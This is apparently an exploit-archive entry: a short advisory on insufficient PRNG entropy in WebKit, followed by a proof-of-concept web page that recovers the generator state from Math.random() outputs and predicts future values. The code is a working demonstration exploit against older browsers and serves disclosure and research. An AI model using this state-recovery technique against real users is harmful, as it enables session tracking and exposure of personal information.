WebKit - Insufficient Entropy Random Number Generator (1)

source: https://www.securityfocus.com/bid/44952/info

WebKit is prone to a random-number-generator weakness.

Attackers can exploit this issue by enticing an unsuspecting user into visiting a malicious webpage.

Successful attacks will allow attackers to track user sessions and obtain personal information that can aid in further attacks.

NOTE: This issue was previously covered in BID 44938 (Apple Safari Prior to 5.0.3 and 4.1.3 Multiple Security Vulnerabilities) but has been given its own record to better document it. 

<html>
<body>
<script>
document.write("Browser: "+navigator.userAgent);
</script>
<br>
<br>
<script>
interval=200;
iid=null;
function setint()
{
      interval=document.getElementById('x').value;
      clearInterval(iid);
      iid=setInterval("recalc()",interval);
      return;
}
</script>
<form>
Polling interval:<br>
Use low values    (e.g. 200)  for  PRNG state  mark  demo and reseed
counting<br>
Use high values (e.g. 5000) for PRNG prediction demo<br>
<input type="text" id="x" value="200"><br>
<input type="button" value="Change" onClick="setint();">
</form>
Total MSVCRT PRNG invocations (since this page load):
<div id="total"></div><br>
MSVCRT PRNG invocations since last reseed:
<div id="current"></div><br>
MSVCRT PRNG reseed count (since this page load):
<div id="reseed"></div><br>
MSVCRT PRNG state mark:
<div id="mark"></div><br>
Current Math.random():
<div id="math_random"></div><br>
Calculated next Math.random() values:
<div id="next"></div><br>
<script>
var total_counter=0;
var current_counter=0;
var reseed_counter=0;
var state=0;
var mark=0;
function adv(x)
{
      return (214013*x+2531011) & 0x7FFFFFFF;
}
function update_counters(reseed)
{
      document.getElementById("total").innerText=total_counter;
      document.getElementById("current").innerText=current_counter;
      document.getElementById("reseed").innerText=reseed_counter;
      document.getElementById("mark").innerText=mark;
      m=Math.random();
      state=adv(state);
      state2=adv(state);
      state2=adv(state2);
      document.getElementById("math_random").innerText=m;
      document.getElementById("next").innerText=
      ((((adv(state2)>>16)&0x7FFF)<<15)|((state2>>16)&0x7FFF))/(1<<30
);
      state2=adv(state2);
      state2=adv(state2);
      document.getElementById("next").innerText+=" "+
      ((((adv(state2)>>16)&0x7FFF)<<15)|((state2>>16)&0x7FFF))/(1<<30
);
}
function find_mark(st)
{
      for (;;)
      {
            if ((st & 0x3FF)==0)
            {
                  return st>>10;
            }
            st=adv(st);
      }
}
function recalc()
{
      var rr=new Array();
      rr[0]=Math.random()*Math.pow(2,30);
      // Try to resync with the PRNG.
      // Allow up to 1000 iterations from previous sync
      for (k=0;k<1000;k++)
      {
            state=adv(state);
            if ((((state>>16)&0x7FFF)==(rr[0]&0x7FFF)) &&
                (((adv(state)>>16)&0x7FFF)==(rr[0]>>15)))
            {
                  state=adv(state);
                  total_counter+=k;
                  current_counter+=k;
                  mark=find_mark(state);
                  update_counters(false);
                  return;
            }
      }
      rr[1]=Math.random()*Math.pow(2,30);
      var r=new Array();
      for (i=0;i<2;i++)
      {
            r.push(rr[i] & 0x7FFF);
            r.push(rr[i]>>15);
      }
      for (v=0;v<(1<<16);v++)
      {
            state=(r[0]<<16)|v;
            for (j=1;j<4;j++)
            {
                  state=adv(state);
                  if (((state>>16)&0x7FFF)!=r[j])
                  {
                        break;
                  }
            }
            if (j==4)
            {
                  reseed_counter++;
                  current_counter=0;
                  mark=find_mark(state);
                  update_counters(true);
                  return;
            }
      }
}
recalc();
setint();
</script>
</body>
</html>